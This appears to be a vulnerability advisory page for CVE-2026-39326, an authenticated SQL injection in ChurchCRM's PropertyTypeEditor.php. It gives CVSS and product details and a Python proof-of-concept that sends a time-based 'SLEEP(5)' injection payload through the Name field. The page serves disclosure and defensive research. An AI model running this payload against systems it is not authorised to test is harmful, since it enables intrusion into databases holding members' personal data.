Security Vulnerability Report
CVE-2026-39326 CVSS 8.8 HIGH

Published: 2026-04-07 18:16:44
Last Modified: 2026-04-10 20:58:33

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, an SQL injection vulnerability was found in the endpoint /PropertyTypeEditor.php in ChurchCRM. Authenticated users with the role isMenuOptionsEnabled can inject arbitrary SQL statements through the Name and Description parameters and thus extract and modify information from the database. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def verify_sqli(target_url, session_cookie):
    """
    Proof of Concept for CVE-2026-39326
    This script exploits the SQL injection in PropertyTypeEditor.php via the 'Name' parameter.
    """
    # Target endpoint
    endpoint = target_url + "/PropertyTypeEditor.php"

    # Headers including session cookie for authentication
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/x-www-form-urlencoded",
    }

    # Payload to test SQL injection (Time-based)
    # Attempting to inject a single quote to break the query and add a sleep command
    payload = "' AND SLEEP(5)-- -"

    # Data to be sent in the POST request
    data = {
        "Name": payload,
        "Description": "Test Description",
        "Action": "Add",  # Assuming 'Add' is a valid action, might vary by version
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, headers=headers, data=data, timeout=10)

        # Check if the request took longer than expected (indicating SLEEP(5) executed)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! Server response delayed.")
        else:
            print("[-] Vulnerability not confirmed or payload incorrect.")
    except requests.RequestException as e:
        print(f"[!] Error during request: {e}")


if __name__ == "__main__":
    # Example usage
    target = "http://localhost"  # Replace with actual target
    cookie = "PHPSESSID=attacker_session_id"  # Replace with valid authenticated session
    verify_sqli(target, cookie)

Weakness

CWE-89 (SQL Injection)

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-mch7-6v8f-c4j5 (Third Party Advisory)
